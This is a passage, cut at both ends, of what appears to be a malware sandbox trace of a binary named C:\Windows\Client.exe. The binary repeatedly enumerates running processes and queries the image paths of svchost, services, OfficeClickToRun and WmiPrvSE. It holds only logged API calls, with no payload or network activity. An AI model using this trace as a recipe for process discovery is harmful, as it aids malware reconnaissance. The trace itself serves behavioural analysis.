lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0291.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0291.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0b38, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0291.461] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x530) returned 0x170 [0291.461] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0291.464] CloseHandle (hObject=0x170) returned 1 [0291.464] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x530) returned 0x170 [0291.464] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0291.467] CloseHandle (hObject=0x170) returned 1 [0291.467] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x530) returned 0x170 [0291.467] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0291.469] CloseHandle (hObject=0x170) returned 1 [0291.469] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0291.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x604) returned 0x170 [0291.469] GetPriorityClass (hProcess=0x170) returned 0x20 [0291.469] CloseHandle (hObject=0x170) returned 1 [0291.469] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x604) returned 0x170 [0291.469] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", lpdwSize=0x18fd44) returned 1 [0291.471] CloseHandle (hObject=0x170) returned 1 [0291.471] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0291.475] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.476] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.477] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.478] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.479] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.479] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.480] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.481] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.481] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.482] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.483] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.483] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.484] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.485] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.486] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.486] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.487] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.488] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.488] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.489] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.490] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.491] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.491] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0291.492] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0291.492] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0291.492] CloseHandle (hObject=0x178) returned 1 [0291.492] CloseHandle (hObject=0x170) returned 1 [0291.493] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0291.493] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0291.777] CloseHandle (hObject=0x170) returned 1 [0291.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0291.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0b68, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0291.778] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x604) returned 0x170 [0291.778] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", lpdwSize=0x18fd48) returned 1 [0291.781] CloseHandle (hObject=0x170) returned 1 [0291.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0291.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0291.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", cchWideChar=78, lpMultiByteStr=0x9ee868, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 78 [0291.781] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x604) returned 0x170 [0291.781] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", lpdwSize=0x18fd40) returned 1 [0291.784] CloseHandle (hObject=0x170) returned 1 [0291.785] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x604) returned 0x170 [0291.785] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", lpdwSize=0x18fd48) returned 1 [0291.788] CloseHandle (hObject=0x170) returned 1 [0291.788] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x604) returned 0x170 [0291.788] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe", lpdwSize=0x18fd48) returned 1 [0291.791] CloseHandle (hObject=0x170) returned 1 [0291.791] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0291.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x170 [0291.791] GetPriorityClass (hProcess=0x170) returned 0x20 [0291.791] CloseHandle (hObject=0x170) returned 1 [0291.792] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x6e4) returned 0x170 [0291.792] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", lpdwSize=0x18fd44) returned 1 [0291.794] CloseHandle (hObject=0x170) returned 1 [0291.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0291.799] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.800] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.801] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.802] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.803] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.804] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.806] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.807] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.808] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.808] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.811] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.812] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.813] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.813] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.814] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.815] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.816] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.817] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.818] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.818] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.819] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.947] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.948] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0291.949] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.950] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x178 [0291.950] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="") returned 0x0 [0291.950] CloseHandle (hObject=0x178) returned 1 [0291.950] CloseHandle (hObject=0x170) returned 1 [0291.950] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x248) returned 0x170 [0291.951] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18faf0) returned 1 [0291.952] CloseHandle (hObject=0x170) returned 1 [0291.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0291.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0291.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0b98, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exe", lpUsedDefaultChar=0x0) returned 31 [0291.952] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x6e4) returned 0x170 [0291.952] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", lpdwSize=0x18fd48) returned 1 [0291.955] CloseHandle (hObject=0x170) returned 1 [0291.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0291.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0291.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", cchWideChar=37, lpMultiByteStr=0x9f5c48, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 37 [0291.956] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x6e4) returned 0x170 [0291.956] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", lpdwSize=0x18fd40) returned 1 [0291.959] CloseHandle (hObject=0x170) returned 1 [0291.959] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x6e4) returned 0x170 [0291.959] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", lpdwSize=0x18fd48) returned 1 [0291.962] CloseHandle (hObject=0x170) returned 1 [0291.962] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x6e4) returned 0x170 [0291.962] QueryFullProcessImageNameW (in: hProcess=0x170, 